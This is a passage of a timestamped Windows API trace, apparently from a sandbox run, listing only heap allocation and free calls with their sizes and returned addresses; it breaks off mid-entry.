[0107.490] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x55db20 | out: hHeap=0x530000) returned 1 [0107.490] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x450) returned 0x5488f0 [0107.490] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x450) returned 0x57d920 [0107.491] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5488f0 | out: hHeap=0x530000) returned 1 [0107.491] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1ea7) returned 0x57dd80 [0107.491] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xf40) returned 0x5493c0 [0107.491] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x7a0) returned 0x54a310 [0107.491] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57dd80 | out: hHeap=0x530000) returned 1 [0107.491] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5493c0 | out: hHeap=0x530000) returned 1 [0107.491] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xbf0) returned 0x5493c0 [0107.491] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57d920 | out: hHeap=0x530000) returned 1 [0107.491] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x54a310 | out: hHeap=0x530000) returned 1 [0107.491] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x640) returned 0x5488f0 [0107.492] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1247) returned 0x57d920 [0107.492] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5493c0 | out: hHeap=0x530000) returned 1 [0107.492] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5488f0 | out: hHeap=0x530000) returned 1 [0107.492] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x520) returned 0x5488f0 [0107.492] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1b56) returned 0x5493c0 [0107.492] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57d920 | out: hHeap=0x530000) returned 1 [0107.492] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5488f0 | out: hHeap=0x530000) returned 1 [0107.492] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x8a0) returned 0x57d920 [0107.492] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x28ed) returned 0x54af20 [0107.492] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5493c0 | out: hHeap=0x530000) returned 1 [0107.492] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57d920 | out: hHeap=0x530000) returned 1 [0107.492] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x550) returned 0x5488f0 [0107.492] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5488f0 | out: hHeap=0x530000) returned 1 [0107.492] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x2537) returned 0x57d920 [0107.492] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x12b7) returned 0x5493c0 [0107.492] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x950) returned 0x54d820 [0107.493] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57d920 | out: hHeap=0x530000) returned 1 [0107.493] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5493c0 | out: hHeap=0x530000) returned 1 [0107.493] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x3d4f) returned 0x54e180 [0107.493] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x54af20 | out: hHeap=0x530000) returned 1 [0107.493] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x54d820 | out: hHeap=0x530000) returned 1 [0107.493] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x2377) returned 0x57d920 [0107.493] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x11d7) returned 0x551ee0 [0107.493] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x8e0) returned 0x5493c0 [0107.493] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57d920 | out: hHeap=0x530000) returned 1 [0107.493] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x551ee0 | out: hHeap=0x530000) returned 1 [0107.494] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5493c0 | out: hHeap=0x530000) returned 1 [0107.494] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x5b0) returned 0x5488f0 [0107.494] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5488f0 | out: hHeap=0x530000) returned 1 [0107.494] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x640) returned 0x5488f0 [0107.494] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x5be2) returned 0x55db20 [0107.494] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x54e180 | out: hHeap=0x530000) returned 1 [0107.494] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5488f0 | out: hHeap=0x530000) returned 1 [0107.494] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x890) returned 0x57d920 [0107.494] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57d920 | out: hHeap=0x530000) returned 1 [0107.494] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xac0) returned 0x57d920 [0107.494] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57d920 | out: hHeap=0x530000) returned 1 [0107.494] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x20) returned 0x53b750 [0107.494] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x960) returned 0x57d920 [0107.494] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x960) returned 0x57e290 [0107.494] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57d920 | out: hHeap=0x530000) returned 1 [0107.495] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x460) returned 0x5488f0 [0107.495] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xe0f) returned 0x57ec00 [0107.495] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57e290 | out: hHeap=0x530000) returned 1 [0107.495] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5488f0 | out: hHeap=0x530000) returned 1 [0107.495] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1c17) returned 0x563710 [0107.495] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xe00) returned 0x57d920 [0107.495] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x700) returned 0x565330 [0107.495] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x563710 | out: hHeap=0x530000) returned 1 [0107.495] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57d920 | out: hHeap=0x530000) returned 1 [0107.495] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x153d) returned 0x563710 [0107.495] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57ec00 | out: hHeap=0x530000) returned 1 [0107.495] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565330 | out: hHeap=0x530000) returned 1 [0107.495] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x2277) returned 0x57d920 [0107.495] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1157) returned 0x564c60 [0107.495] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x8a0) returned 0x565dc0 [0107.496] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57d920 | out: hHeap=0x530000) returned 1 [0107.496] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x564c60 | out: hHeap=0x530000) returned 1 [0107.496] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1fc7) returned 0x57d920 [0107.496] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x563710 | out: hHeap=0x530000) returned 1 [0107.496] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565dc0 | out: hHeap=0x530000) returned 1 [0107.496] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1657) returned 0x563710 [0107.496] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xb20) returned 0x564d70 [0107.496] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x590) returned 0x5488f0 [0107.496] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x563710 | out: hHeap=0x530000) returned 1 [0107.496] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x564d70 | out: hHeap=0x530000) returned 1 [0107.497] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x2f96) returned 0x563710 [0107.497] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57d920 | out: hHeap=0x530000) returned 1 [0107.497] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5488f0 | out: hHeap=0x530000) returned 1 [0107.497] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x2b47) returned 0x5666b0 [0107.497] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x15b7) returned 0x57d920 [0107.497] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xad0) returned 0x57eee0 [0107.497] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5666b0 | out: hHeap=0x530000) returned 1 [0107.497] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57d920 | out: hHeap=0x530000) returned 1 [0107.497] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57eee0 | out: hHeap=0x530000) returned 1 [0107.497] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x2697) returned 0x57d920 [0107.497] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1367) returned 0x5666b0 [0107.498] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x9a0) returned 0x567a20 [0107.498] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57d920 | out: hHeap=0x530000) returned 1 [0107.498] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5666b0 | out: hHeap=0x530000) returned 1 [0107.498] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x474d) returned 0x5683d0 [0107.498] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x563710 | out: hHeap=0x530000) returned 1 [0107.498] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x567a20 | out: hHeap=0x530000) returned 1 [0107.498] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x920) returned 0x56cb30 [0107.498] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56cb30 | out: hHeap=0x530000) returned 1 [0107.498] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1b47) returned 0x57d920 [0107.498] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xd90) returned 0x56cb30 [0107.499] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x6d0) returned 0x57f470 [0107.499] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57d920 | out: hHeap=0x530000) returned 1 [0107.499] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56cb30 | out: hHeap=0x530000) returned 1 [0107.499] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57f470 | out: hHeap=0x530000) returned 1 [0107.499] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x5d0) returned 0x5488f0 [0107.499] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x6adf) returned 0x5493c0 [0107.499] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5683d0 | out: hHeap=0x530000) returned 1 [0107.499] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5488f0 | out: hHeap=0x530000) returned 1 [0107.499] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1887) returned 0x57d920 [0107.499] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc30) returned 0x57f1b0 [0107.499] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x620) returned 0x5488f0 [0107.499] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57d920 | out: hHeap=0x530000) returned 1 [0107.499] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57f1b0 | out: hHeap=0x530000) returned 1 [0107.499] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5488f0 | out: hHeap=0x530000) returned 1 [0107.499] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x8f0) returned 0x57d920 [0107.499] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x480) returned 0x5488f0 [0107.500] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x240) returned 0x57e220 [0107.500] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57d920 | out: hHeap=0x530000) returned 1 [0107.500] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5488f0 | out: hHeap=0x530000) returned 1 [0107.500] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57e220 | out: hHeap=0x530000) returned 1 [0107.500] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x40) returned 0x540110 [0107.500] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x53b750 | out: hHeap=0x530000) returned 1 [0107.500] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x55db20 | out: hHeap=0x530000) returned 1 [0107.500] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5493c0 | out: hHeap=0x530000) returned 1 [0107.501] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x540110 | out: hHeap=0x530000) returned 1 [0107.501] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x9900) returned 0x5493c0 [0107.501] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1bf0) returned 0x57d920 [0107.503] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57d920 | out: hHeap=0x530000) returned 1 [0107.504] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x9937) returned 0x55db20 [0107.700] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5493c0 | out: hHeap=0x530000) returned 1 [0107.700] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x20) returned 0x53b570 [0107.700] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x9900) returned 0x5493c0 [0107.700] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1bf0) returned 0x57d920 [0107.700] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57d920 | out: hHeap=0x530000) returned 1 [0107.700] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x9937) returned 0x57d920 [0107.701] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5493c0 | out: hHeap=0x530000) returned 1 [0107.701] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x40) returned 0x540d90 [0107.701] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x53b570 | out: hHeap=0x530000) returned 1 [0107.701] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x553770 | out: hHeap=0x530000) returned 1 [0107.702] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56da20 | out: hHeap=0x530000) returned 1 [0107.702] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x540e80 | out: hHeap=0x530000) returned 1 [0107.702] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x5493c0 [0107.702] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x567460 [0107.702] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x8) returned 0x538ce0 [0107.702] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x587260 [0107.703] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x10) returned 0x5492c0 [0107.703] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x538ce0 | out: hHeap=0x530000) returned 1 [0107.703] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x59a470 [0107.703] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x5490a0 [0107.703] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5492c0 | out: hHeap=0x530000) returned 1 [0107.703] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x5ad680 [0107.704] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x20) returned 0x53b600 [0107.704] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5490a0 | out: hHeap=0x530000) returned 1 [0107.704] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x5c0890 [0107.704] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x30) returned 0x548370 [0107.704] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x53b600 | out: hHeap=0x530000) returned 1 [0107.704] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x5d3aa0 [0107.704] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x5e6cb0 [0107.705] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x48) returned 0x5404d0 [0107.705] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x548370 | out: hHeap=0x530000) returned 1 [0107.705] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x5f9ec0 [0107.705] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x60d0d0 [0107.705] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x1e50080 [0107.706] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x68) returned 0x538ce0 [0107.707] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5404d0 | out: hHeap=0x530000) returned 1 [0107.707] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x1e63290 [0107.708] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x1e764a0 [0107.708] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x1e896b0 [0107.708] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x1e9c8c0 [0107.709] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x98) returned 0x535090 [0107.709] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x538ce0 | out: hHeap=0x530000) returned 1 [0107.709] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x1eafad0 [0107.709] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x1ec2ce0 [0107.710] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x1ed5ef0 [0107.710] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x1ee9100 [0107.710] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x1efc310 [0107.711] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x1f0f520 [0107.711] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xe0) returned 0x538ce0 [0107.711] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x535090 | out: hHeap=0x530000) returned 1 [0107.711] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x1f22730 [0107.711] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2000080 [0107.712] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2013290 [0107.712] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x20264a0 [0107.713] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x20396b0 [0107.713] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x204c8c0 [0107.713] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x205fad0 [0107.714] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2072ce0 [0107.714] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2085ef0 [0107.714] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x150) returned 0x53b090 [0107.714] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x538ce0 | out: hHeap=0x530000) returned 1 [0107.714] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2099100 [0107.715] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x20ac310 [0107.715] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x20bf520 [0107.715] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x20d2730 [0107.716] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x20e5940 [0107.716] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x20f8b50 [0107.716] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x210bd60 [0107.717] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x211ef70 [0107.717] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2132180 [0107.718] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2145390 [0107.718] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x21585a0 [0107.719] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x216b7b0 [0107.719] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x217e9c0 [0107.720] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2191bd0 [0107.720] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1f8) returned 0x5488f0 [0107.720] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x53b090 | out: hHeap=0x530000) returned 1 [0107.721] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x21a4de0 [0107.721] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x21b7ff0 [0107.721] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x21cb200 [0107.722] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x21de410 [0107.722] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2200080 [0107.723] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2213290 [0107.723] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x22264a0 [0107.724] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x22396b0 [0107.724] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x224c8c0 [0107.725] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x225fad0 [0107.725] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2272ce0 [0107.726] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2285ef0 [0107.726] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2299100 [0107.727] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x22ac310 [0107.727] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x22bf520 [0107.727] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x22d2730 [0107.728] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x22e5940 [0107.728] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x22f8b50 [0107.729] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x230bd60 [0107.729] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x231ef70 [0107.730] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2332180 [0107.730] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x2f0) returned 0x548af0 [0107.730] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5488f0 | out: hHeap=0x530000) returned 1 [0107.730] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2345390 [0107.731] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x23585a0 [0107.731] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x236b7b0 [0107.732] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x237e9c0 [0107.732] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2391bd0 [0107.732] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x23a4de0 [0107.732] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x23b7ff0 [0107.733] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x23cb200 [0107.733] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x23de410 [0107.734] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x23f1620 [0107.734] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2404830 [0107.735] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2417a40 [0107.735] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x242ac50 [0107.976] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x243de60 [0107.976] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2451070 [0107.977] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2464280 [0107.977] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2477490 [0107.978] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x248a6a0 [0107.978] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x249d8b0 [0107.978] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x24b0ac0 [0107.979] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x24c3cd0 [0107.979] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x24d6ee0 [0107.980] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x24ea0f0 [0107.980] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x24fd300 [0107.981] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2510510 [0107.981] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2523720 [0107.982] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2536930 [0107.982] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2549b40 [0107.982] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x255cd50 [0107.983] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x256ff60 [0107.983] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2583170 [0107.983] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, 